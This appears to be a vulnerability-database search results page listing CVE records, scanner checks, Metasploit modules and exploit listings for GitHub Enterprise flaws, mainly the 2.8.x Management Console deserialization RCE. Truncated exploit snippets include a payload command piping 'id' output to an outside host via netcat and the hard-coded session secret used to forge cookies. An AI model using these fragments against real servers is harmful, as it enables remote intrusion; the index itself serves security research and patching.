930 matches found

Cvelist
added 2020/08/27 9:55 p.m.

CVE-2020-10518 Unsafe configuration options in GitHub Pages leading to remote code execution on GitHub Enterprise Server

A remote code execution vulnerability was identified in GitHub Enterprise Server that could be exploited when building a GitHub Pages site. User-controlled configuration of the underlying parsers used by GitHub Pages were not sufficiently restricted and made it possible to execute commands on the...

AI score 9, EPSS 0.03152
Exploits 0, References 3
OSV
added 2020/06/03 2:15 p.m.

CVE-2020-10516

An improper access control vulnerability was identified in the GitHub Enterprise Server API that allowed an organization member to escalate permissions and gain access to unauthorized repositories within an organization. This vulnerability affected all versions of GitHub Enterprise Server prior t...

CVSS 9.8, AI score 7.3
Exploits 0, References 3
NVD
added 2019/03/28 6:29 a.m.

CVE-2017-18365

The Management Console in GitHub Enterprise 2.8.x before 2.8.7 has a deserialization issue that allows unauthenticated remote attackers to execute arbitrary code. This occurs because the enterprise session secret is always the same, and can be found in the product's source code. By sending a...

CVSS 9.8, AI score 9.8, EPSS 0.33438
Exploits 1, References 2
Prion
added 2019/03/28 6:29 a.m.

Deserialization of untrusted data

The Management Console in GitHub Enterprise 2.8.x before 2.8.7 has a deserialization issue that allows unauthenticated remote attackers to execute arbitrary code. This occurs because the enterprise session secret is always the same, and can be found in the product's source code. By sending a...

CVSS 7.5, AI score 9.7, EPSS 0.33438
Exploits 1, References 2, Affected Software 1
OSV
added 2019/03/28 6:29 a.m.

CVE-2017-18365

The Management Console in GitHub Enterprise 2.8.x before 2.8.7 has a deserialization issue that allows unauthenticated remote attackers to execute arbitrary code. This occurs because the enterprise session secret is always the same, and can be found in the product's source code. By sending a...

CVSS 9.8, AI score 6, EPSS 0.33438
Exploits 1, References 2
CVE
added 2019/03/28 5:23 a.m.

CVE-2017-18365

GitHub Enterprise 2.8.x before 2.8.7’s Management Console is affected by a deserialization vulnerability that enables unauthenticated remote code execution. The root cause is a constant enterprise session secret present in the source, allowing a crafted cookie signed with that secret to trigger M...

CVSS 9.8, AI score 9.8, EPSS 0.33438
In wild, Exploits 1, References 2, Affected Software 1
Kitploit
added 2019/02/15 12:39 p.m.

SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool

SSRF is often used to leverage actions on other services; this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz. Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform...

AI score 7.7
Exploits 0, References 3
Kitploit
added 2018/04/12 1:17 p.m.

Git-All-Secrets - A Tool To Capture All The Git Secrets By Leveraging Multiple Open Source Git Searching Tools

git-all-secrets is a tool that can: Clone multiple public/private github repositories of an organization and scan them, Clone multiple public/private github repositories of a user that belongs to an organization and scan them, Clone a single public/private repository of an organization and scan it...

AI score 6.5
Exploits 0, References 10
Tenable Nessus
added 2017/12/19 12:00 a.m.

GitHub Enterprise Management Console RCE

GitHub Enterprise contains a flaw in the management console that is due to Ruby on Rails using a static session secret, which can allow a remote attacker to forge cookies. These cookies are insecurely deserialized, potentially allowing the execution of arbitrary code. (C) Tenable Network Security,...

AI score 6
Exploits 0, References 2
Ivan 'd0znpp' Novikov
added 2017/08/06 3:36 a.m.

SSRF, Memcached and other key-value injections in the wild

Back in 2012 we released SSRF, different techniques to exploit Memcached servers and other services with host-based authentication through SSRF. Two years after, in 2014, I presented Memcached injection techniques at Black Hat USA. There I mentioned that it’s possible to exploit it as a Remot...

AI score 8.2
Exploits 0
0day.today
added 2017/07/29 12:00 a.m.

GitHub Enterprise < 2.8.7 - Remote Code Execution Exploit

Exploit for multiple platform in category web applications #!/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\email protected" +...

AI score 7.1
Exploits 0
OpenVAS
added 2017/03/30 12:00 a.m.

GitHub Enterprise < 2.8.10 Multiple Vulnerabilities

GitHub Enterprise is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:github:githubenterprise";...

AI score 7.4
Exploits 0, References 1
OpenVAS
added 2017/03/30 12:00 a.m.

GitHub Enterprise Detection (Linux/Unix SSH Login)

SSH login-based detection of GitHub Enterprise. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if description...

AI score 7
Exploits 0
0day.today
added 2017/03/27 12:00 a.m.

Github Enterprise Default Session Secret And Deserialization Exploit

This Metasploit module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6. The first is that the session management uses a hard-coded secret value, which can be abused to sign a serialized malicious Ruby object. The second problem is due to the use of unsafe deserialization,...

AI score 7.8
Exploits 0
Packet Storm
added 2017/03/27 12:00 a.m.

Github Enterprise Default Session Secret And Deserialization

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Github Enterprise Default Session Secret And Deserialization Vulnerability", 'Description' = %q This module exploits two securi...

AI score 0.6
Exploits 0
Exploit DB
added 2017/03/27 12:00 a.m.

Github Enterprise - Default Session Secret and Deserialization (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Github Enterprise Default Session Secret And Deserialization Vulnerability", 'Description' = %q This module exploits two securi...

AI score 7.4
Exploits 0
Metasploit
added 2017/03/23 3:40 p.m.

Github Enterprise Default Session Secret And Deserialization Vulnerability

This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6. The first is that the session management uses a hard-coded secret value, which can be abused to sign a serialized malicious Ruby object. The second problem is due to the use of unsafe deserialization, which allo...

AI score 0.2
Exploits 0
OpenVAS
added 2017/03/17 12:00 a.m.

GitHub Enterprise WebGUI / Management Console Detection (HTTP)

HTTP based detection of the GitHub Enterprise WebGUI or Management Console. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if description...

AI score 7.4
Exploits 0
OpenVAS
added 2017/03/17 12:00 a.m.

GitHub Enterprise 2.8.x < 2.8.7 Management Console RCE Vulnerability - Active Check

GitHub Enterprise suffers from a remote code execution (RCE) vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

CVSS 9.8, AI score 10, EPSS 0.33438
Exploits 1, References 3
0day.today
added 2017/03/16 12:00 a.m.

GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution Exploit

Exploit for ruby platform in category web applications #!/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / '...

AI score 7.1
Exploits 0